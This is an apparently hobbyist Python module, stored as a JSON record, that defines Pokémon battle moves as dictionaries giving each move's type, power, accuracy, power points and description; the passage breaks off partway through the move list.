 +{"seq_id":"352257288","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*- \n\n# import namedtuple from the collections module.\nfrom collections import namedtuple\n# import random module\nimport random\n# import regex module\nimport re\n# import system module\nimport sys\n# import pokemon types module\nfrom pokemon_types import *\n\n########################\n### File information ###\n########################\n\n__author__ = \"Lindsay Gelle (https://github.com/gellel)\"\n\n__version__ = \"1.0\"\n\n__all__ = [\n\t\"ABSORB\",\n\t\"ACID\",\n\t\"ACID_ARMOUR\",\n\t\"AGILITY\",\n\t\"AMNESIA\",\n\t\"AURORA_BEAM\",\n\t\"BARRAGE\",\n\t\"BARRIER\",\n\t\"BIDE\",\n\t\"BIND\",\n\t\"BITE\",\n\t\"BLIZZARD\",\n\t\"BODY_SLAM\",\n\t\"BONEMERANG\",\n\t\"BONE_CLUB\",\n\t\"BUBBLE\",\n\t\"BUBBLE_BEAM\",\n\t\"CLAMP\",\n\t\"COMET_PUNCH\",\n\t\"CONFUSE_RAY\",\n\t\"CONFUSION\",\n\t\"CONSTRICT\",\n\t\"CONVERSION\",\n\t\"COUNTER\",\n\t\"CRABHAMMER\",\n\t\"CUT\",\n\t\"DEFENSE_CURL\",\n\t\"DIG\",\n\t\"DISABLE\",\n\t\"DIZZY_PUNCH\",\n\t\"DOUBLE_EDGE\",\n\t\"DOUBLE_KICK\",\n\t\"DOUBLE_SLAP\",\n\t\"DOUBLE_TEAM\",\n\t\"DRAGON_RAGE\",\n\t\"DREAM_EATER\",\n\t\"DRILL_PECK\",\n\t\"EARTHQUAKE\",\n\t\"EGG_BOMB\",\n\t\"EMBER\",\n\t\"EXPLOSION\",\n\t\"FIRE_BLAST\",\n\t\"FIRE_PUNCH\",\n\t\"FIRE_SPIN\",\n\t\"FISSURE\",\n\t\"FLAMETHROWER\",\n\t\"FLASH\",\n\t\"FLY\",\n\t\"FOCUS_ENERGY\",\n\t\"FURY_ATTACK\",\n\t\"FURY_SWIPES\",\n\t\"GLARE\",\n\t\"GROWL\",\n\t\"GROWTH\",\n\t\"GUILLOTINE\",\n\t\"GUST\",\n\t\"HARDEN\",\n\t\"HAZE\",\n\t\"HEADBUTT\",\n\t\"HIGH_JUMP_KICK\",\n\t\"HORN_ATTACK\",\n\t\"HORN_DRILL\",\n\t\"HYDRO_PUMP\",\n\t\"HYPER_BEAM\",\n\t\"HYPER_FANG\",\n\t\"HYPNOSIS\",\n\t\"ICE_BEAM\",\n\t\"ICE_PUNCH\",\n\t\"JUMP_KICK\",\n\t\"KARATE_CHOP\",\n\t\"KINESIS\",\n\t\"LEECH_LIFE\",\n\t\"LEECH_SEED\",\n\t\"LEER\",\n\t\"LICK\",\n\t\"LIGHT_SCREEN\",\n\t\"LOVELY_KISS\",\n\t\"LOW_KICK\",\n\t\"MEDITATE\",\n\t\"MEGA_DRAIN\",\n\t\"MEGA_KICK\",\n\t\"MEGA_PUNCH\",\n\t\"METRONOME\",\n\t\"MIMIC\",\n\t\"MINIMIZE\",\n\t\"MIRROR_MOVE\",\n\t\"MIST\",\n\t\"NIGHT_SHADE\",\n\t\"PAY_DAY\",\n\t\"PECK\",\n\t\"PETAL_DANCE\",\n\t\"PIN_MISSILE\",\n\t\"POISON_GAS\",\n\t\"POISON_POWDER\",\n\t\"POISON_STING\",\n\t\"POUND\",\n\t\"PSYBEAM\",\n\t\"PSYCHIC\",\n\t\"PSYWAVE\",\n\t\"QUICK_ATTACK\",\n\t\"RAGE\",\n\t\"RAZOR_LEAF\",\n\t\"RAZOR_WIND\",\n\t\"RECOVER\",\n\t\"REFLECT\",\n\t\"REST\",\n\t\"ROAR\",\n\t\"ROCK_SLIDE\",\n\t\"ROCK_THROW\",\n\t\"ROLLING_KICK\",\n\t\"SAND_ATTACK\",\n\t\"SCRATCH\",\n\t\"SCREECH\",\n\t\"SEISMIC_TOSS\",\n\t\"SELF_DESTRUCT\",\n\t\"SHARPEN\",\n\t\"SING\",\n\t\"SKULL_BASH\",\n\t\"SKY_ATTACK\",\n\t\"SLAM\",\n\t\"SLASH\",\n\t\"SLEEP_POWDER\",\n\t\"SLUDGE\",\n\t\"SMOG\",\n\t\"SMOKESCREEN\",\n\t\"SOFT_BOILED\",\n\t\"SOLAR_BEAM\",\n\t\"SONIC_BOOM\",\n\t\"SPIKE_CANNON\",\n\t\"SPLASH\",\n\t\"SPORE\",\n\t\"STOMP\",\n\t\"STRENGTH\",\n\t\"STRING_SHOT\",\n\t\"STRUGGLE\",\n\t\"STUN_SPORE\",\n\t\"SUBMISSION\",\n\t\"SUBSTITUTE\",\n\t\"SUPERSONIC\",\n\t\"SUPER_FANG\",\n\t\"SURF\",\n\t\"SWIFT\",\n\t\"SWORDS_DANCE\",\n\t\"TACKLE\",\n\t\"TAIL_WHIP\",\n\t\"TAKE_DOWN\",\n\t\"TELEPORT\",\n\t\"THRASH\",\n\t\"THUNDER\",\n\t\"THUNDERBOLT\",\n\t\"THUNDER_PUNCH\",\n\t\"THUNDER_SHOCK\",\n\t\"THUNDER_WAVE\",\n\t\"TOXIC\",\n\t\"TRANSFORM\",\n\t\"TRI_ATTACK\",\n\t\"TWINEEDLE\",\n\t\"VICE_GRIP\",\n\t\"VINE_WHIP\",\n\t\"WATERFALL\",\n\t\"WATER_GUN\",\n\t\"WHIRLWIND\",\n\t\"WING_ATTACK\",\n\t\"WITHDRAW\",\n\t\"WRAP\"]\n\n########################\n### Module constants ###\n########################\n\nABSORB = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 20,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"User recovers half the HP inflicted on opponent.\")\n\nACID = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May lower opponent's Special Defense.\")\n\nACID_ARMOUR = dict(\n\tELEMENT_TYPE = \"POISON\",\n\tATTRIBUTES = POISON,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 
20,\n\tDESCRIPTION = \"Sharply raises user's Defense.\")\n\nAGILITY = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Sharply raises user's Speed.\")\n\nAMNESIA = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Sharply raises user's Special Defense.\")\n\nAURORA_BEAM = dict(\n\tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65, \n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May lower opponent's Attack.\")\n\nBARRAGE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nBARRIER = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Sharply raises user's Defense.\")\n\nBIDE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User takes damage for two turns then strikes back double.\")\n\nBIND = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\nBITE = dict(\n \tELEMENT_TYPE = \"DARK\",\n\tATTRIBUTES = DARK,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 60,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"May cause flinching.\")\n\nBLIZZARD = dict(\n \tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110,\n\tACCURACY = 70,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"May freeze opponent.\")\n\nBODY_SLAM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 85,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nBONE_CLUB = dict(\n\tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 65,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May cause flinching.\")\n\nBONEMERANG = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Hits twice in one turn.\")\n\nBUBBLE = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May lower opponent's Speed.\")\n\nBUBBLE_BEAM = dict(\n\tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 65, \n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"May lower opponent's Speed.\")\n\nCLAMP = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 35,\n\tACCURACY = 85,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\nCOMET_PUNCH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 18,\n\tACCURACY = 85,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nCONFUSE_RAY = dict(\n\tELEMENT_TYPE = \"GHOST\",\n\tATTRIBUTES = GHOST,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 
100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Confuses opponent.\")\n\nCONFUSION = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 50,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"May confuse opponent.\")\n\nCONSTRICT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 10,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"May lower opponent's Speed by one stage.\")\n\nCONVERSION = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Changes user's type to that of its first move.\")\n\nCOUNTER = dict(\n \tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"When hit by a Physical Attack, user strikes back with 2x POWER.\")\n\nCRABHAMMER = dict(\n \tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100,\n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nCUT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 95,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"\")\n\nDEFENSE_CURL = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Raises user's Defense.\")\n\nDIG = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Digs underground on first turn, attacks on second. 
Can also escape from caves.\")\n\nDISABLE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Opponent can't use its last attack for a few turns.\")\n\nDIZZY_PUNCH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 70,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May confuse opponent.\")\n\nDOUBLE_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 30,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Hits twice in one turn.\")\n\nDOUBLE_SLAP = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nDOUBLE_TEAM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Raises user's Evasiveness.\")\n\nDOUBLE_EDGE = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 120, \n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"User receives recoil damage.\")\n\nDRAGON_RAGE = dict(\n\tELEMENT_TYPE = \"DRAGON\",\n\tATTRIBUTES = DRAGON,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Always inflicts 40 HP.\")\n\nDREAM_EATER = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 100,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"User recovers half the HP inflicted on a sleeping opponent.\")\n\nDRILL_PECK = dict(\n\tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"\")\n\nEARTHQUAKE = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"POWER is doubled if opponent is underground from using Dig.\")\n\nEGG_BOMB = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100, \n\tACCURACY = 75,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"\")\n\nEMBER = dict(\n \tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"May burn opponent.\")\n\nEXPLOSION = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 250,\n\tACCURACY = 100,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"User faints.\")\n\nFIRE_BLAST = dict(\n\tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110, \n\tACCURACY = 85,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"May burn opponent.\")\n\nFIRE_PUNCH = dict(\n\tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May burn opponent.\")\n\nFIRE_SPIN = dict(\n\tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 35, \n\tACCURACY = 85,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Traps opponent, damaging them for 4-5 turns.\")\n\nFISSURE = dict(\n \tELEMENT_TYPE = \"GROUND\",\n\tATTRIBUTES = GROUND,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = 
\"One-Hit-KO, if it hits.\")\n\nFLAMETHROWER = dict(\n \tELEMENT_TYPE = \"FIRE\",\n\tATTRIBUTES = FIRE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May burn opponent.\")\n\nFLASH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nFLY = dict(\n \tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 90,\n\tACCURACY = 95,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Flies up on first turn, attacks on second turn.\")\n\nFOCUS_ENERGY = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Increases critical hit ratio.\")\n\nFURY_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 15,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nFURY_SWIPES = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 18,\n\tACCURACY = 80,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Hits 2-5 times in one turn.\")\n\nGLARE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Paralyzes opponent.\")\n\nGROWL = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Lowers opponent's Attack.\")\n\nGROWTH = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 40,\n\tDESCRIPTION = \"Raises user's Attack and Special Attack.\")\n\nGUILLOTINE = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"One-Hit-KO, if it hits.\")\n\nGUST = dict(\n \tELEMENT_TYPE = \"FLYING\",\n\tATTRIBUTES = FLYING,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40,\n\tACCURACY = 100,\n\tPOWER_POINTS = 35,\n\tDESCRIPTION = \"Hits Pokemon using Fly/Bounce with double POWER.\")\n\nHARDEN = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Raises user's Defense.\")\n\nHAZE = dict(\n \tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Resets all stat changes.\")\n\nHEADBUTT = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 70,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nHIGH_JUMP_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 130, \n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"If it misses, the user loses half their HP.\")\n\nHORN_ATTACK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 65,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"\")\n\nHORN_DRILL = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = 
\"One-Hit-KO, if it hits.\")\n\nHYDRO_PUMP = dict(\n\tELEMENT_TYPE = \"WATER\",\n\tATTRIBUTES = WATER,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 110, \n\tACCURACY = 80,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"\")\n\nHYPER_BEAM = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 150, \n\tACCURACY = 90,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"User must recharge next turn.\")\n\nHYPER_Fang = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 90,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May cause flinching.\")\n\nHYPNOSIS = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 60,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nICE_BEAM = dict(\n\tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 90, \n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"May freeze opponent.\")\n\nICE_PUNCH = dict(\n\tELEMENT_TYPE = \"ICE\",\n\tATTRIBUTES = ICE,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 75,\n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"May freeze opponent.\")\n\nJUMP_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 100, \n\tACCURACY = 95,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"If it misses, the user loses half their HP.\")\n\nKARATE_CHOP = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 50,\n\tACCURACY = 100,\n\tPOWER_POINTS = 25,\n\tDESCRIPTION = \"High critical hit ratio.\")\n\nKINESIS = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 80,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"Lowers opponent's ACCURACY.\")\n\nLEECH_LIFE = dict(\n\tELEMENT_TYPE = \"BUG\",\n\tATTRIBUTES = BUG,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 100,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User recovers half the HP inflicted on opponent.\")\n\nLEECH_SEED = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 90,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"User steals HP from opponent each turn.\")\n\nLEER = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Lowers opponent's Defense.\")\n\nLICK = dict(\n \tELEMENT_TYPE = \"GHOST\",\n\tATTRIBUTES = GHOST,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 30,\n\tACCURACY = 100,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"May paralyze opponent.\")\n\nLIGHT_SCREEN = dict(\n\tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = None,\n\tPOWER_POINTS = 30,\n\tDESCRIPTION = \"Halves damage from Special attacks for 5 turns.\")\n\nLOVELY_KISS = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None, \n\tACCURACY = 75,\n\tPOWER_POINTS = 10,\n\tDESCRIPTION = \"Puts opponent to sleep.\")\n\nLOW_KICK = dict(\n\tELEMENT_TYPE = \"FIGHTING\",\n\tATTRIBUTES = FIGHTING,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = None,\n\tACCURACY = 100,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"The heavier the opponent, the stronger the attack.\")\n\nMEDITATE = dict(\n \tELEMENT_TYPE = \"PSYCHIC\",\n\tATTRIBUTES = PSYCHIC,\n\tCATEGORY = \"STATUS\",\n\tPOWER = None,\n\tACCURACY = None,\n\tPOWER_POINTS = 
40,\n\tDESCRIPTION = \"Raises user's Attack.\")\n\nMEGA_DRAIN = dict(\n\tELEMENT_TYPE = \"GRASS\",\n\tATTRIBUTES = GRASS,\n\tCATEGORY = \"SPECIAL\",\n\tPOWER = 40, \n\tACCURACY = 100,\n\tPOWER_POINTS = 15,\n\tDESCRIPTION = \"User recovers half the HP inflicted on opponent.\")\n\nMEGA_KICK = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 120, \n\tACCURACY = 75,\n\tPOWER_POINTS = 5,\n\tDESCRIPTION = \"\")\n\nMEGA_PUNCH = dict(\n\tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = \"PHYSICAL\",\n\tPOWER = 80,\n\tACCURACY = 85,\n\tPOWER_POINTS = 20,\n\tDESCRIPTION = \"\")\n\nMETRONOME = dict(\n \tELEMENT_TYPE = \"NORMAL\",\n\tATTRIBUTES = NORMAL,\n\tCATEGORY = 